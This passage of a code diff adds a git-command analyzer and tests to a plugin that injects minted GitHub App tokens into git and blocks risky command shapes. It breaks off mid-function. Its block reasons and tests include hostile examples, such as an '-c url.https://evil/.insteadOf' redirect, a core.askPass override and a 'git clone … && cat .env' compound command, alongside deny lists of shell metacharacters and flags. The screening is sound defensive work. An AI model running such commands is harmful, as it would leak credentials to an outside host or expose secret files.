+  // rewrittenCommand replaces the executed command: `cd <dir> && git …` becomes
+  // `git -C <dir> …` so the token-bearing command stays a single bare `git`
+  // (no sibling process inherits the askpass env).
+  | { kind: 'inject'; repoSlug: string; rewrittenCommand?: string }
+
+// Returns null when the remote/config is absent or git fails — the analyzer
+// then passes through so git fails honestly rather than us guessing a repo.
+export type GitRemoteResolver = (cwd: string, remote: string) => Promise<string | null>
+export type GitConfigResolver = (cwd: string, key: string) => Promise<string | null>
+export type GitBranchResolver = (cwd: string) => Promise<string | null>
+
+export type GitResolvers = {
+  resolveRemoteUrl: GitRemoteResolver
+  resolveConfig: GitConfigResolver
+  resolveCurrentBranch: GitBranchResolver
+}
+
+async function runGit(cwd: string, args: string[]): Promise<string | null> {
+  const bun = (globalThis as { Bun?: { spawn: typeof Bun.spawn } }).Bun
+  if (!bun) return null
+  try {
+    const proc = bun.spawn({
+      cmd: ['git', '-C', cwd, ...args],
+      stdout: 'pipe',
+      stderr: 'ignore',
+      env: { ...process.env, GIT_TERMINAL_PROMPT: '0', GIT_OPTIONAL_LOCKS: '0' },
+    })
+    const exitCode = await proc.exited
+    if (exitCode !== 0) return null
+    const out = (await new Response(proc.stdout).text()).trim()
+    return out === '' ? null : out
+  } catch {
+    return null
+  }
+}
+
+export const defaultGitResolvers: GitResolvers = {
+  resolveRemoteUrl: (cwd, remote) => runGit(cwd, ['remote', 'get-url', remote]),
+  resolveConfig: (cwd, key) => runGit(cwd, ['config', '--get', key]),
+  resolveCurrentBranch: (cwd) => runGit(cwd, ['symbolic-ref', '--short', 'HEAD']),
+}
+
+const REMOTE_SUBCOMMANDS = new Set(['push', 'fetch', 'pull', 'clone', 'ls-remote'])
+
+const MULTI_OWNER_REASON =
+  'This git command targets repos under more than one owner; a single minted ' +
+  'GitHub App token cannot authenticate all of them. Split it into separate ' +
+  'commands, one owner each.'
+
+const COMPOSITION_REASON =
+  'A repo-targeting `git` command receives a minted GitHub App token via ' +
+  'GIT_ASKPASS in its process environment, so it must run as a single bare ' +
+  '`git` command — no `;`, `&&`, `||`, `&`, newlines, pipes, redirections, ' +
+  'command/parameter substitution, or subshells (any sibling process would ' +
+  'inherit the token). The one accepted prefix is `cd <simple-path> && git …`, ' +
+  'which is rewritten to `git -C <path> …`.'
+
+// OUTSIDE single quotes these spawn a sibling process (which would inherit the
+// askpass token) or expand shell state. `$`/backtick stay active inside double
+// quotes too, so they are screened separately. Mirrors gh-command.ts.
+const SHELL_ACTIVE_METACHARS = new Set(['|', ';', '&', '\n', '\r', '(', ')', '{', '}', '<', '>', '`', '$'])
+
+export async function analyzeGitCommand(
+  command: string,
+  options: { cwd: string; resolvers: GitResolvers },
+): Promise<GitCommandDecision> {
+  const stripped = stripSafeCdPrefix(command)
+  const segment = extractSingleGitInvocation(stripped.rest)
+  if (segment === null) return { kind: 'pass-through' }
+
+  const args = segment.args
+  const subcommand = findSubcommand(args)
+  if (subcommand === undefined || !REMOTE_SUBCOMMANDS.has(subcommand)) return { kind: 'pass-through' }
+
+  const dashCDir = extractDashCDir(args)
+  const effectiveCwd = resolveCwd(options.cwd, dashCDir ?? stripped.cdDir)
+
+  const slugs = await resolveRepoSlugs(subcommand, args, effectiveCwd, options.resolvers)
+  if (slugs.length === 0) return { kind: 'pass-through' }
+
+  const owners = new Set(slugs.map((s) => s.split('/')[0]))
+  if (owners.size > 1) return { kind: 'block', reason: MULTI_OWNER_REASON }
+
+  const repoSlug = slugs[0] as string
+
+  // Injecting the askpass token into env means any sibling process inherits it,
+  // so a token-bearing command must be a single bare `git`. A `cd … && git …`
+  // is allowed only by rewriting away the `&&` into `git -C …`.
+  if (stripped.cdDir !== null) {
+    if (containsShellActiveMetachar(stripped.rest)) return { kind: 'block', reason: COMPOSITION_REASON }
+    return { kind: 'inject', repoSlug, rewrittenCommand: rewriteCdToDashC(effectiveCwd, stripped.rest) }
+  }
+  if (containsShellActiveMetachar(command)) return { kind: 'block', reason: COMPOSITION_REASON }
+  return { kind: 'inject', repoSlug }
+}
+
+async function resolveRepoSlugs(
+  subcommand: string,
+  args: readonly string[],
+  cwd: string,
+  resolvers: GitResolvers,
+): Promise<string[]> {
+  const explicitUrl = extractExplicitUrl(subcommand, args)
+  if (explicitUrl !== null) {
+    const slug = parseGithubRepoFromGitUrl(explicitUrl)
+    return slug === null ? [] : [slug]
+  }
+
+  // clone needs an explicit URL; it has no configured-remote fallback.
+  if (subcommand === 'clone') return []
+
+  const remoteName = extractRemoteName(args) ?? (await resolveDefaultPushRemote(cwd, resolvers))
+  if (remoteName === null) return []
+  if (looksLikeUrl(remoteName)) {
+    const slug = parseGithubRepoFromGitUrl(remoteName)
+    return slug === null ? [] : [slug]
+  }
+  const url = await resolvers.resolveRemoteUrl(cwd, remoteName)
+  if (url === null) return []
+  const slug = parseGithubRepoFromGitUrl(url)
+  return slug === null ? [] : [slug]
+}
+
+// Mirrors git's own push-remote resolution order for a bare `git push`.
+async function resolveDefaultPushRemote(cwd: string, resolvers: GitResolvers): Promise<string | null> {
+  const branch = await resolvers.resolveCurrentBranch(cwd)
+  if (branch !== null && branch !== '') {
+    const perBranch = await resolvers.resolveConfig(cwd, `branch.${branch}.pushRemote`)
+    if (perBranch !== null && perBranch !== '') return perBranch
+  }
+  const pushDefault = await resolvers.resolveConfig(cwd, 'remote.pushDefault')
+  if (pushDefault !== null && pushDefault !== '') return pushDefault
+  return 'origin'
+}
+
+const HTTPS_GITHUB_RE = /^https:\/\/github\.com\/([^/\s:@]+)\/([^/\s?#]+?)(?:\.git)?\/?(?:[?#].*)?$/i
+const SCP_GITHUB_RE = /^git@github\.com:([^/\s:]+)\/([^/\s]+?)(?:\.git)?$/i
+const SSH_GITHUB_RE = /^ssh:\/\/git@github\.com\/([^/\s]+)\/([^/\s?#]+?)(?:\.git)?\/?(?:[?#].*)?$/i
+
+// Parses a github.com remote URL into an `owner/name` slug. Returns null for
+// non-github.com hosts, credential-bearing https URLs (https://tok@github.com/…
+// — we never reuse an embedded credential), local paths, or malformed input.
+export function parseGithubRepoFromGitUrl(raw: string): string | null {
+  const url = raw.trim()
+  for (const re of [HTTPS_GITHUB_RE, SCP_GITHUB_RE, SSH_GITHUB_RE]) {
+    const m = url.match(re)
+    if (m === null) continue
+    const owner = m[1]
+    const name = m[2]
+    if (owner === undefined || name === undefined || owner === '' || name === '') return null
+    return `${owner}/${name}`
+  }
+  return null
+}
+
+function looksLikeUrl(token: string): boolean {
+  if (/^[a-z][a-z0-9+.-]*:\/\//i.test(token)) return true
+  if (/^[^@\s]+@[^:\s]+:/.test(token)) return true
+  return false
+}
+
+// Flags that consume the FOLLOWING token, so a remote/URL positional is not
+// mistaken for a flag's value.
+const GIT_VALUE_FLAGS = new Set(['-C', '-c', '--git-dir', '--work-tree', '-o', '--origin', '-b', '--branch', '-u'])
+
+function extractExplicitUrl(subcommand: string, args: readonly string[]): string | null {
+  // `git push --repo <url>` / `--repo=<url>`
+  for (let i = 0; i < args.length; i++) {
+    const arg = args[i] as string
+    if (arg === '--repo' || arg === '--repository') {
+      const v = args[i + 1]
+      if (v !== undefined && looksLikeUrl(v)) return v
+    }
+    if (arg.startsWith('--repo=')) return arg.slice('--repo='.length)
+    if (arg.startsWith('--repository=')) return arg.slice('--repository='.length)
+  }
+  // First positional after the subcommand that looks like a URL.
+  for (const pos of positionalsAfterSubcommand(subcommand, args)) {
+    if (looksLikeUrl(pos)) return pos
+  }
+  return null
+}
+
+// The git subcommand is the first positional that is NOT consumed by a global
+// value-flag (`git -C <dir> push`, `git -c k=v push`). A naive first-non-flag
+// scan would pick the flag's value (e.g. `<dir>`) as the subcommand.
+function findSubcommand(args: readonly string[]): string | undefined {
+  for (let i = 0; i < args.length; i++) {
+    const arg = args[i] as string
+    if (arg.startsWith('-')) {
+      if (!arg.includes('=') && GIT_VALUE_FLAGS.has(arg)) i += 1
+      continue
+    }
+    return arg
+  }
+  return undefined
+}
+
+function extractRemoteName(args: readonly string[]): string | null {
+  const sub = findSubcommand(args)
+  if (sub === undefined) return null
+  const positionals = positionalsAfterSubcommand(sub, args)
+  const first = positionals[0]
+  if (first === undefined || looksLikeUrl(first)) return null
+  return first
+}
+
+function positionalsAfterSubcommand(subcommand: string, args: readonly string[]): string[] {
+  const out: string[] = []
+  let seenSub = false
+  for (let i = 0; i < args.length; i++) {
+    const arg = args[i] as string
+    if (arg.startsWith('-')) {
+      if (!arg.includes('=') && GIT_VALUE_FLAGS.has(arg)) i += 1
+      continue
+    }
+    if (!seenSub) {
+      if (arg === subcommand) seenSub = true
+      continue
+    }
+    out.push(arg)
+  }
+  return out
+}
+
+function extractDashCDir(args: readonly string[]): string | null {
+  for (let i = 0; i < args.length; i++) {
+    const arg = args[i]
+    if (arg === '-C') {
+      const v = args[i + 1]
+      if (v !== undefined) return stripQuotes(v)
+    }
+  }
+  return null
+}
+
+type GitInvocation = { args: string[] }
+
+// Null unless there is exactly one `git` at command position. Composition is NOT
+// rejected here — it is screened later against the original command so the block
+// reason stays accurate.
+function extractSingleGitInvocation(command: string): GitInvocation | null {
+  const tokens = tokenize(command)
+  const gitStarts: number[] = []
+  for (let i = 0; i < tokens.length; i++) {
+    if (tokens[i] !== 'git') continue
+    if (i === 0 || isCommandBoundaryBefore(tokens, i)) gitStarts.push(i)
+  }
+  if (gitStarts.length !== 1) return null
+  const start = gitStarts[0] as number
+  return { args: tokens.slice(start + 1).filter((t) => t !== '\n' && t !== ';' && t !== '|' && t !== '&') }
+}
+
+function isCommandBoundaryBefore(tokens: readonly string[], index: number): boolean {
+  let cursor = index - 1
+  while (cursor >= 0) {
+    const prev = tokens[cursor]
+    if (prev === undefined) return false
+    if (prev === '&&' || prev === '||' || prev === '|' || prev === ';' || prev === '\n') return true
+    if (/^[A-Za-z_][A-Za-z0-9_]*=/.test(prev)) {
+      cursor -= 1
+      continue
+    }
+    return false
+  }
+  return true
+}
+
+function containsShellActiveMetachar(command: string): boolean {
+  let quote: '"' | "'" | null = null
+  for (let i = 0; i < command.length; i++) {
+    const ch = command[i] as string
+    if (quote === "'") {
+      if (ch === "'") quote = null
+      continue
+    }
+    if (quote === '"') {
+      if (ch === '$' || ch === '`') return true
+      if (ch === '"') quote = null
+      continue
+    }
+    if (ch === "'" || ch === '"') {
+      quote = ch
+      continue
+    }
+    if (SHELL_ACTIVE_METACHARS.has(ch)) return true
+  }
+  return false
+}
+
+type StrippedCd = { cdDir: string | null; rest: string }
+
+// Accepts ONLY `cd <simple-path> && git …`. <simple-path> must be a single
+// token (optionally quoted) free of metachars AND of a literal single quote
+// (rewriteCdToDashC single-quotes it). Any other shape returns cdDir=null, and
+// the caller then requires a single bare `git`.
+function stripSafeCdPrefix(command: string): StrippedCd {
+  const m = command.match(/^\s*cd\s+("[^"]*"|'[^']*'|[^\s'"]+)\s+&&\s+(git\b[\s\S]*)$/)
+  if (m === null) return { cdDir: null, rest: command }
+  const rawDir = m[1] as string
+  const rest = m[2] as string
+  const dir = stripQuotes(rawDir)
+  if (dir.includes('$') || dir.includes('`') || dir.includes("'") || /[;|&<>()]/.test(dir)) {
+    return { cdDir: null, rest: command }
+  }
+  return { cdDir: dir, rest }
+}
+
+function rewriteCdToDashC(dir: string, gitCommand: string): string {
+  return gitCommand.replace(/^git\b/, `git -C '${dir}'`)
+}
+
+function resolveCwd(base: string, dir: string | null): string {
+  if (dir === null || dir === '') return base
+  if (dir.startsWith('/')) return dir
+  return `${base.replace(/\/$/, '')}/${dir}`
+}
+
+function stripQuotes(token: string): string {
+  if (token.length < 2) return token
+  const first = token[0]
+  const last = token[token.length - 1]
+  if ((first === '"' && last === '"') || (first === "'" && last === "'")) return token.slice(1, -1)
+  return token
+}
+
+// Quote-aware; emits shell control operators as standalone tokens so
+// command-boundary detection works. Mirrors gh-command.ts's tokenize.
+function tokenize(command: string): string[] {
+  const tokens: string[] = []
+  let current = ''
+  let quote: '"' | "'" | null = null
+  let hasContent = false
+
+  const flush = (): void => {
+    if (hasContent) {
+      tokens.push(current)
+      current = ''
+      hasContent = false
+    }
+  }
+
+  for (let i = 0; i < command.length; i++) {
+    const ch = command[i]
+    if (ch === undefined) continue
+    if (quote !== null) {
+      if (ch === quote) quote = null
+      else current += ch
+      continue
+    }
+    if (ch === '"' || ch === "'") {
+      quote = ch
+      hasContent = true
+      continue
+    }
+    if (ch === ' ' || ch === '\t') {
+      flush()
+      continue
+    }
+    if (ch === '\n') {
+      flush()
+      tokens.push('\n')
+      continue
+    }
+    if (ch === ';' || ch === '|' || ch === '&') {
+      flush()
+      const next = command[i + 1]
+      if ((ch === '|' && next === '|') || (ch === '&' && next === '&')) {
+        tokens.push(ch + ch)
+        i += 1
+      } else {
+        tokens.push(ch)
+      }
+      continue
+    }
+    current += ch
+    hasContent = true
+  }
+  flush()
+  return tokens
+}

--- a/src/bundled-plugins/github-cli-auth/git-command.ts
+++ b/src/bundled-plugins/github-cli-auth/git-command.ts
@@ -69,6 +69,19 @@ const COMPOSITION_REASON =
   'inherit the token). The one accepted prefix is `cd <simple-path> && git …`, ' +
   'which is rewritten to `git -C <path> …`.'
 
+const DANGEROUS_CONFIG_REASON =
+  'A repo-targeting `git` command that would receive a minted GitHub App token ' +
+  'cannot carry a leading environment assignment or `-c`/`--config-env`/' +
+  '`--git-dir`/`--work-tree`/`--namespace`/`--exec-path`: those can redirect ' +
+  "git's authentication or destination away from the resolved repo (e.g. " +
+  '`-c url.https://evil/.insteadOf=…` or `-c core.askPass=…`), which would leak ' +
+  'the token. Remove them and re-run, or run without the minted token.'
+
+const FETCH_ALL_REASON =
+  '`git fetch --all` / `git pull --all` contacts every configured remote, which ' +
+  'cannot be enumerated safely here — a minted token scoped to one remote could ' +
+  'be sent to another. Fetch a specific remote instead.'
+
 // OUTSIDE single quotes these spawn a sibling process (which would inherit the
 // askpass token) or expand shell state. `$`/backtick stay active inside double
 // quotes too, so they are screened separately. Mirrors gh-command.ts.
@@ -79,6 +92,7 @@ export async function analyzeGitCommand(
   options: { cwd: string; resolvers: GitResolvers },
 ): Promise<GitCommandDecision> {
   const stripped = stripSafeCdPrefix(command)
+  if (stripped.unsafe) return { kind: 'pass-through' }
   const segment = extractSingleGitInvocation(stripped.rest)
   if (segment === null) return { kind: 'pass-through' }
 
@@ -86,10 +100,30 @@ export async function analyzeGitCommand(
   const subcommand = findSubcommand(args)
   if (subcommand === undefined || !REMOTE_SUBCOMMANDS.has(subcommand)) return { kind: 'pass-through' }
 
-  const dashCDir = extractDashCDir(args)
-  const effectiveCwd = resolveCwd(options.cwd, dashCDir ?? stripped.cdDir)
+  // We are about to put a live token in this process's env. Reject any command
+  // that could redirect git's auth/destination away from the resolved repo:
+  // user `-c` (url.*.insteadOf, core.askPass, credential.*, http.*), a leading
+  // env assignment (`GIT_ASKPASS=… git …`), or a different git-dir/work-tree.
+  if (segment.hasLeadingEnvAssignment || hasDangerousGitConfig(args)) {
+    return { kind: 'block', reason: DANGEROUS_CONFIG_REASON }
+  }
+  // `fetch/pull --all` contacts every configured remote; we cannot enumerate
+  // them here, so we could mint for one and leak the token to another. Block.
+  if ((subcommand === 'fetch' || subcommand === 'pull') && args.includes('--all')) {
+    return { kind: 'block', reason: FETCH_ALL_REASON }
+  }
 
-  const slugs = await resolveRepoSlugs(subcommand, args, effectiveCwd, options.resolvers)
+  const dashCDir = extractDashCDir(args)
+  const effectiveCwd = resolveCwd(resolveCwd(options.cwd, stripped.cdDir), dashCDir)
+
+  // A resolver that throws is treated as "couldn't resolve" → pass-through, so a
+  // git/subprocess failure never crashes the hook or guesses a repo.
+  let slugs: string[]
+  try {
+    slugs = await resolveRepoSlugs(subcommand, args, effectiveCwd, options.resolvers)
+  } catch {
+    return { kind: 'pass-through' }
+  }
   if (slugs.length === 0) return { kind: 'pass-through' }
 
   const owners = new Set(slugs.map((s) => s.split('/')[0]))
@@ -99,13 +133,32 @@ export async function analyzeGitCommand(
 
   // Injecting the askpass token into env means any sibling process inherits it,
   // so a token-bearing command must be a single bare `git`. A `cd … && git …`
-  // is allowed only by rewriting away the `&&` into `git -C …`.
+  // is allowed only by rewriting away the `&&` into `git -C …` — but not when the
+  // git part already has its own `-C` (the rewrite would stack two and change cwd).
   if (stripped.cdDir !== null) {
-    if (containsShellActiveMetachar(stripped.rest)) return { kind: 'block', reason: COMPOSITION_REASON }
+    if (containsShellActiveMetachar(stripped.rest) || dashCDir !== null) {
+      return { kind: 'block', reason: COMPOSITION_REASON }
+    }
     return { kind: 'inject', repoSlug, rewrittenCommand: rewriteCdToDashC(effectiveCwd, stripped.rest) }
   }
   if (containsShellActiveMetachar(command)) return { kind: 'block', reason: COMPOSITION_REASON }
   return { kind: 'inject', repoSlug }
+}
+
+// Global flags that can redirect git's auth or destination. `-c`/`--config-env`
+// inject arbitrary config (url.insteadOf, core.askPass, credential.*, http.*);
+// `--git-dir`/`--work-tree`/`--namespace`/`--exec-path` point git at a different
+// repo or helper than the one we resolved. Any of these on a token-bearing
+// command means we cannot vouch for where the token goes — block.
+function hasDangerousGitConfig(args: readonly string[]): boolean {
+  for (const arg of args) {
+    if (arg === '-c' || arg === '--config-env') return true
+    if (arg === '--git-dir' || arg.startsWith('--git-dir=')) return true
+    if (arg === '--work-tree' || arg.startsWith('--work-tree=')) return true
+    if (arg === '--namespace' || arg.startsWith('--namespace=')) return true
+    if (arg === '--exec-path' || arg.startsWith('--exec-path=')) return true
+  }
+  return false
 }
 
 async function resolveRepoSlugs(
@@ -130,7 +183,12 @@ async function resolveRepoSlugs(
   // --multiple origin upstream` touches both, and feeding only one to the
   // multi-owner guard would let a second-owner remote slip past and still mint.
   const remoteNames = extractRemoteNames(args)
-  const remotes = remoteNames.length > 0 ? remoteNames : [await resolveDefaultPushRemote(cwd, resolvers)]
+  // The branch.pushRemote/pushDefault/origin chain is a PUSH default; applying it
+  // to a bare `fetch`/`pull`/`ls-remote` could mint for the wrong (push) remote,
+  // so only push falls back. Other subcommands with no explicit remote pass through.
+  const remotes =
+    remoteNames.length > 0 ? remoteNames : subcommand === 'push' ? [await resolveDefaultPushRemote(cwd, resolvers)] : []
+  if (remotes.length === 0) return []
 
   const slugs: string[] = []
   for (const remote of remotes) {
@@ -156,8 +214,8 @@ async function resolveDefaultPushRemote(cwd: string, resolvers: GitResolvers): P
 }
 
 const HTTPS_GITHUB_RE = /^https:\/\/github\.com\/([^/\s:@]+)\/([^/\s?#]+?)(?:\.git)?\/?(?:[?#].*)?$/i
-const SCP_GITHUB_RE = /^git@github\.com:([^/\s:]+)\/([^/\s]+?)(?:\.git)?$/i
-const SSH_GITHUB_RE = /^ssh:\/\/git@github\.com\/([^/\s]+)\/([^/\s?#]+?)(?:\.git)?\/?(?:[?#].*)?$/i
+const SCP_GITHUB_RE = /^git@github\.com:([^/\s:?#]+)\/([^/\s?#]+?)(?:\.git)?$/i
+const SSH_GITHUB_RE = /^ssh:\/\/git@github\.com(?::\d+)?\/([^/\s]+)\/([^/\s?#]+?)(?:\.git)?\/?(?:[?#].*)?$/i
 
 // Parses a github.com remote URL into an `owner/name` slug. Returns null for
 // non-github.com hosts, credential-bearing https URLs (https://tok@github.com/…
@@ -261,11 +319,13 @@ function extractDashCDir(args: readonly string[]): string | null {
   return null
 }
 
-type GitInvocation = { args: string[] }
+type GitInvocation = { args: string[]; hasLeadingEnvAssignment: boolean }
 
 // Null unless there is exactly one `git` at command position. Composition is NOT
 // rejected here — it is screened later against the original command so the block
-// reason stays accurate.
+// reason stays accurate. hasLeadingEnvAssignment flags `FOO=bar git …`: such an
+// assignment lands in git's env (where a `GIT_ASKPASS=…` override would receive
+// the token), so the caller blocks it for token-bearing commands.
 function extractSingleGitInvocation(command: string): GitInvocation | null {
   const tokens = tokenize(command)
   const gitStarts: number[] = []
@@ -275,7 +335,9 @@ function extractSingleGitInvocation(command: string): GitInvocation | null {
   }
   if (gitStarts.length !== 1) return null
   const start = gitStarts[0] as number
-  return { args: tokens.slice(start + 1).filter((t) => t !== '\n' && t !== ';' && t !== '|' && t !== '&') }
+  const hasLeadingEnvAssignment = start > 0 && /^[A-Za-z_][A-Za-z0-9_]*=/.test(tokens[start - 1] ?? '')
+  const args = tokens.slice(start + 1).filter((t) => t !== '\n' && t !== ';' && t !== '|' && t !== '&')
+  return { args, hasLeadingEnvAssignment }
 }
 
 function isCommandBoundaryBefore(tokens: readonly string[], index: number): boolean {
@@ -315,22 +377,26 @@ function containsShellActiveMetachar(command: string): boolean {
   return false
 }
 
-type StrippedCd = { cdDir: string | null; rest: string }
+// unsafe=true when the command LOOKS like a `cd … && git …` but the cd target is
+// not a plain path we can faithfully turn into `git -C` (shell `~`/`-` expansion,
+// metachars). The caller then passes through rather than rewrite wrong cwd.
+type StrippedCd = { cdDir: string | null; rest: string; unsafe: boolean }
 
 // Accepts ONLY `cd <simple-path> && git …`. <simple-path> must be a single
-// token (optionally quoted) free of metachars AND of a literal single quote
-// (rewriteCdToDashC single-quotes it). Any other shape returns cdDir=null, and
-// the caller then requires a single bare `git`.
+// token (optionally quoted) free of metachars and of a literal single quote
+// (rewriteCdToDashC single-quotes it), and not a shell-expanded `~`/`-`. A plain
+// command (no `cd` prefix) returns cdDir=null, unsafe=false.
 function stripSafeCdPrefix(command: string): StrippedCd {
   const m = command.match(/^\s*cd\s+("[^"]*"|'[^']*'|[^\s'"]+)\s+&&\s+(git\b[\s\S]*)$/)
-  if (m === null) return { cdDir: null, rest: command }
+  if (m === null) return { cdDir: null, rest: command, unsafe: false }
   const rawDir = m[1] as string
   const rest = m[2] as string
   const dir = stripQuotes(rawDir)
-  if (dir.includes('$') || dir.includes('`') || dir.includes("'") || /[;|&<>()]/.test(dir)) {
-    return { cdDir: null, rest: command }
+  const shellExpands = dir === '-' || dir === '~' || dir.startsWith('~/')
+  if (dir.includes('$') || dir.includes('`') || dir.includes("'") || /[;|&<>()]/.test(dir) || shellExpands) {
+    return { cdDir: null, rest: command, unsafe: true }
   }
-  return { cdDir: dir, rest }
+  return { cdDir: dir, rest, unsafe: false }
 }
 
 function rewriteCdToDashC(dir: string, gitCommand: string): string {

--- a/src/bundled-plugins/github-cli-auth/index.test.ts
+++ b/src/bundled-plugins/github-cli-auth/index.test.ts
@@ -1,10 +1,14 @@
 import { afterEach, describe, expect, test } from 'bun:test'
+import { mkdtempSync } from 'node:fs'
+import { tmpdir } from 'node:os'
+import { join } from 'node:path'
 
 import { TYPECLAW_INTERNAL_BASH_ENV } from '@/agent/plugin-tools'
 import type { GithubTokenResolveResult } from '@/channels/github-token-bridge'
 import { noopPermissionService } from '@/permissions'
 import type { PluginContext, ToolBeforeEvent } from '@/plugin'
 
+import { resetGitAskPassHelperForTests } from './git-askpass'
 import githubCliAuthPlugin from './index'
 
 const noopLogger = { info: () => {}, warn: () => {}, error: () => {} }
@@ -140,5 +144,122 @@ describe('github-cli-auth plugin', () => {
     )
 
     expect(result).toBeUndefined()
+  })
+})
+
+const hookCtx = { agentDir: '/agent', pluginName: 'github-cli-auth', logger: noopLogger }
+
+describe('github-cli-auth plugin — git path', () => {
+  const askpassDir = mkdtempSync(join(tmpdir(), 'typeclaw-askpass-it-'))
+  process.env.TYPECLAW_GIT_ASKPASS_PATH = join(askpassDir, 'typeclaw-git-askpass')
+  afterEach(() => {
+    resetGitAskPassHelperForTests()
+  })
+
+  test('App auth: injects GIT_ASKPASS + token env for an explicit-URL git clone', async () => {
+    process.env.GH_TOKEN = 'ghs_seeded'
+    const hook = await hookFor(tokenResolver('ghs_minted'))
+    const event = bashEvent('git clone https://github.com/acme/widgets.git')
+
+    const result = await hook(event, hookCtx)
+
+    expect(result).toBeUndefined()
+    const overlay = event.args[TYPECLAW_INTERNAL_BASH_ENV] as Record<string, string>
+    expect(overlay.TYPECLAW_GIT_TOKEN).toBe('ghs_minted')
+    expect(overlay.GIT_ASKPASS).toBeDefined()
+    expect(overlay.GIT_TERMINAL_PROMPT).toBe('0')
+    // The token must never reach the command string.
+    expect(event.args.command).toBe('git clone https://github.com/acme/widgets.git')
+    expect(JSON.stringify(event.args.command)).not.toContain('ghs_minted')
+  })
+
+  test('resolver receives the parsed owner/name slug', async () => {
+    process.env.GH_TOKEN = 'ghs_seeded'
+    const seen: string[] = []
+    const hook = await hookFor(async (slug) => {
+      seen.push(slug)
+      return { kind: 'token', token: 'ghs_minted' }
+    })
+
+    await hook(bashEvent('git clone https://github.com/acme/widgets.git'), hookCtx)
+
+    expect(seen).toEqual(['acme/widgets'])
+  })
+
+  test('App auth: blocks when the bridge is unavailable', async () => {
+    process.env.GH_TOKEN = 'ghs_seeded'
+    const hook = await hookFor(unavailableResolver)
+
+    const result = await hook(bashEvent('git clone https://github.com/acme/widgets.git'), hookCtx)
+
+    expect(result).toEqual({ block: true, reason: 'adapter down' })
+  })
+
+  test('App auth: blocks a compound (token-leaking) git command', async () => {
+    process.env.GH_TOKEN = 'ghs_seeded'
+    const hook = await hookFor(tokenResolver('ghs_minted'))
+
+    const result = await hook(bashEvent('git clone https://github.com/acme/widgets.git && cat .env'), hookCtx)
+
+    expect(result).toMatchObject({ block: true })
+  })
+
+  test('classic PAT: does not mint for git', async () => {
+    process.env.GH_TOKEN = 'ghp_classic'
+    let resolverCalled = false
+    const hook = await hookFor(async () => {
+      resolverCalled = true
+      return { kind: 'token', token: 'ghs_minted' }
+    })
+    const event = bashEvent('git clone https://github.com/acme/widgets.git')
+
+    const result = await hook(event, hookCtx)
+
+    expect(result).toBeUndefined()
+    expect(event.args[TYPECLAW_INTERNAL_BASH_ENV]).toBeUndefined()
+    expect(resolverCalled).toBe(false)
+  })
+
+  test('fine-grained PAT: does not mint for git', async () => {
+    process.env.GH_TOKEN = 'github_pat_xyz'
+    let resolverCalled = false
+    const hook = await hookFor(async () => {
+      resolverCalled = true
+      return { kind: 'token', token: 'ghs_minted' }
+    })
+    const event = bashEvent('git clone https://github.com/acme/widgets.git')
+
+    const result = await hook(event, hookCtx)
+
+    expect(result).toBeUndefined()
+    expect(event.args[TYPECLAW_INTERNAL_BASH_ENV]).toBeUndefined()
+    expect(resolverCalled).toBe(false)
+  })
+
+  test('non-github explicit-URL git command passes through without minting', async () => {
+    process.env.GH_TOKEN = 'ghs_seeded'
+    let resolverCalled = false
+    const hook = await hookFor(async () => {
+      resolverCalled = true
+      return { kind: 'token', token: 'ghs_minted' }
+    })
+    const event = bashEvent('git clone https://gitlab.com/acme/widgets.git')
+
+    const result = await hook(event, hookCtx)
+
+    expect(result).toBeUndefined()
+    expect(event.args[TYPECLAW_INTERNAL_BASH_ENV]).toBeUndefined()
+    expect(resolverCalled).toBe(false)
+  })
+
+  test('plain non-git/gh bash command passes through', async () => {
+    process.env.GH_TOKEN = 'ghs_seeded'
+    const hook = await hookFor(tokenResolver('ghs_minted'))
+    const event = bashEvent('ls -la')
+
+    const result = await hook(event, hookCtx)
+
+    expect(result).toBeUndefined()
+    expect(event.args[TYPECLAW_INTERNAL_BASH_ENV]).toBeUndefined()
   })
 })

--- a/src/bundled-plugins/github-cli-auth/index.ts
+++ b/src/bundled-plugins/github-cli-auth/index.ts
@@ -4,6 +4,8 @@ import { definePlugin } from '@/plugin'
 import { createApproveIdempotencyGuard } from './approve-idempotency'
 import { createGithubEffectiveApprovalResolver, createGithubHeadShaResolver } from './effective-approval'
 import { analyzeGhCommand } from './gh-command'
+import { ensureGitAskPassHelper } from './git-askpass'
+import { analyzeGitCommand, defaultGitResolvers } from './git-command'
 import { checkGraphqlAuthNudge } from './graphql-auth-nudge'
 import { commitReviewIfSucceeded, noteReviewCommand } from './review-recorder'
 import { classifyGhToken } from './token-class'
@@ -19,48 +21,107 @@ export default definePlugin({
       resolveEffectiveApproval: createGithubEffectiveApprovalResolver({ resolveToken }),
       resolveHeadSha: createGithubHeadShaResolver({ resolveToken }),
     })
+
+    type HookResult = void | { block: true; reason: string }
+
+    // 'fall-through' means "not a repo-targeting gh command" so the caller can
+    // try the git path on the same command (e.g. `git ... # gh` substrings).
+    const handleGhCommand = async (params: {
+      event: { callId: string; args: Record<string, unknown> }
+      command: string
+    }): Promise<HookResult | 'fall-through'> => {
+      const { event, command } = params
+      const review = await noteReviewCommand({ callId: event.callId, command })
+      if (review.detected !== null) {
+        const block = await verdictGuard.guard({
+          callId: event.callId,
+          workspace: review.detected.workspace,
+          prNumber: review.detected.prNumber,
+          verdict: review.detected.verdict,
+        })
+        if (block !== null) return block
+      }
+      if (review.dump !== null) return review.dump
+
+      const decision = analyzeGhCommand(command)
+      if (decision.kind === 'pass-through') return 'fall-through'
+
+      const tokenClass = classifyGhToken(process.env.GH_TOKEN)
+      // Classic PATs reach every owner; nothing to inject or enforce.
+      if (tokenClass === 'cross-owner') return
+
+      if (decision.kind === 'block') return { block: true, reason: decision.reason }
+
+      // Fine-grained PATs are single-owner but cannot be re-minted per repo;
+      // the seeded GH_TOKEN is the only token we have. Leave it in place so
+      // `gh` fails honestly if the named repo is under a different owner.
+      if (tokenClass === 'fine-grained-pat') return
+
+      const result = await resolveTokenForRepo(decision.repoSlug)
+      if (result.kind === 'unavailable') return { block: true, reason: result.reason }
+      // Inject via the internal env overlay (delivered to the spawn / bwrap
+      // --setenv by the bash wrapper) so the token never enters the command
+      // string, where it could leak through logs or later hooks.
+      event.args[TYPECLAW_INTERNAL_BASH_ENV] = { GH_TOKEN: result.token }
+      // graphql consumed `-R/--repo` as a mint hint; `gh api` rejects it, so
+      // run the command with the flag stripped (token still rides in env).
+      if (decision.rewrittenCommand !== undefined) event.args.command = decision.rewrittenCommand
+      return
+    }
+
+    const handleGitCommand = async (params: {
+      event: { args: Record<string, unknown> }
+      command: string
+      agentDir: string
+    }): Promise<HookResult> => {
+      const { event, command, agentDir } = params
